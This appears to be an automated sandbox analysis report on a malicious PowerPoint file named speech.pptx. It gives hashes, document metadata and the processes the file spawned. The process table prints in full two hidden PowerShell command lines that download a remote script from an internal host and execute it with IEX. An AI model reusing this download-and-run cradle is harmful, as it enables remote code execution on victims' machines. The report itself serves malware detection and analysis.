File name: | speech.pptx |
Full analysis: | https://app.any.run/tasks/72592428-2ca5-4f83-a587-96011e7dd8b8 |
Verdict: | Malicious activity |
Analysis date: | December 06, 2018, 10:04:29 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.presentationml.presentation |
File info: | Microsoft PowerPoint 2007+ |
MD5: | D3382E4D2951E6CBE94C640584F2DC3A |
SHA1: | BCF86B6CA25433B8B97F56A66D1A044C69A318FA |
SHA256: | D654AA4FB1A2B076696741D100B75A43F00010BA8F6D29B2FF7FAEADA95340FE |
SSDEEP: | 768:nZ+OpWy3S0yS00SneS0JSnjS0MS0bS02S0dS0yt/MlwC9ZwXwqTZAHXExTx30oBu:nQOF/wDnwQXYGyq0cDr |
.pptx | | | PowerPoint Microsoft Office Open XML Format document (87) |
---|---|---|
.zip | | | Open Packaging Conventions container (10.5) |
.zip | | | ZIP compressed archive (2.4) |
AppVersion: | 16 |
---|---|
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
Company: | Microsoft |
TitlesOfParts: |
|
HeadingPairs: |
|
ScaleCrop: | No |
MMClips: | - |
HiddenSlides: | - |
Notes: | - |
Slides: | 1 |
Paragraphs: | - |
PresentationFormat: | Widescreen |
Application: | Microsoft Office PowerPoint |
Words: | - |
TotalEditTime: | 8 minutes |
ModifyDate: | 2018:12:05 12:08:40Z |
CreateDate: | 2018:12:05 12:00:22Z |
RevisionNumber: | 1 |
LastModifiedBy: | root |
Creator: | root |
---|---|
Title: | PowerPoint Presentation |
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 3142 |
ZipCompressedSize: | 429 |
ZipCRC: | 0xf518ccdf |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2824 | "C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\admin\AppData\Local\Temp\speech.pptx" | C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft PowerPoint Version: 14.0.6009.1000 | ||||
2660 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c $P=new-object net.webclient;$P.proxy=[Net.WebRequest]::GetSystemWebProxy();$P.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $P.downloadstring('http:/192.168.88.104:8080/bywpTEifYTlwfa'); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | POWERPNT.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2436 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c $P=new-object net.webclient;$P.proxy=[Net.WebRequest]::GetSystemWebProxy();$P.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $P.downloadstring('http:/192.168.88.104:8080/bywpTEifYTlwfa'); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | POWERPNT.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2824 | POWERPNT.EXE | C:\Users\admin\AppData\Local\Temp\CVR932E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2660 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H5VA5Y2I13YPXYNTJDIO.temp | — | |
MD5:— | SHA256:— | |||
2436 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2H0PMUFGAHTH7D8SGKQY.temp | — | |
MD5:— | SHA256:— | |||
2436 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2660 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2436 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1ad090.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2660 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1ab874.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 |